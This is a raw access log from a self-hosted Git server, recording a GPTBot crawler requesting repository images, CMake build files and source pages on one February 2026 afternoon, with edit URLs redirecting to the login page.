"https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/bearing.png" -[17/Feb/2026:17:07:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/favicon.ico" -[17/Feb/2026:17:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/favicon.ico" -[17/Feb/2026:17:07:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/reactor.png" -[17/Feb/2026:17:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/reactor.png" -[17/Feb/2026:17:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 9852] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/dcsintegration.png" -[17/Feb/2026:17:07:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 9852] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/reactor.png" -[17/Feb/2026:17:07:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 9840] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/bearing.png" -[17/Feb/2026:17:07:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/reactor.png" -[17/Feb/2026:17:07:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 954] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/reactor.png" -[17/Feb/2026:17:07:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 954] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/bearing.png" -[17/Feb/2026:17:07:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/bearing.png" -[17/Feb/2026:17:07:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 954] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/favicon.ico" -[17/Feb/2026:17:07:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/favicon.ico" -[17/Feb/2026:17:07:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 968] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:17:07:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:17:07:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 18685] [Gzip 6.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:17:07:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/dcsintegration.png" -[17/Feb/2026:17:07:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/dcsintegration.png" -[17/Feb/2026:17:07:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14655] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:07:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14656] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:07:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11118] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:07:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11116] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:07:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14654] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:07:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14656] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:07:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11120] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:07:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14656] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:07:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11117] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:07:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:17:07:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:17:07:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:17:07:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/assets/images/honeywell-logo.svg" -[17/Feb/2026:17:07:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11117] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:07:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11114] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:07:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14655] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:07:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11116] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:07:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14661] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:08:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11118] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:08:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14657] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:08:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14656] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:08:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11115] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:17:08:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.json?display=source" [Client 74.7.227.38] [Length 11493] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.json" -[17/Feb/2026:17:08:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/xref-AssetPilot.html?display=rendered" [Client 74.7.227.38] [Length 10938] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/xref-AssetPilot.html" -[17/Feb/2026:17:08:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" -[17/Feb/2026:17:08:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html?display=source" [Client 74.7.227.38] [Length 522366] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" -[17/Feb/2026:17:08:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html?display=source" [Client 74.7.227.38] [Length 522409] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" -[17/Feb/2026:17:08:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/xref-AssetPilot.html?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/xref-AssetPilot.html" -[17/Feb/2026:17:08:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html?display=rendered" [Client 74.7.227.38] [Length 10939] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" -[17/Feb/2026:17:08:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" -[17/Feb/2026:17:08:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" -[17/Feb/2026:17:08:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 474045] [Gzip 19.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:17:08:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 492029] [Gzip 19.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:17:08:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11164] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:17:08:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11164] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:17:08:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr 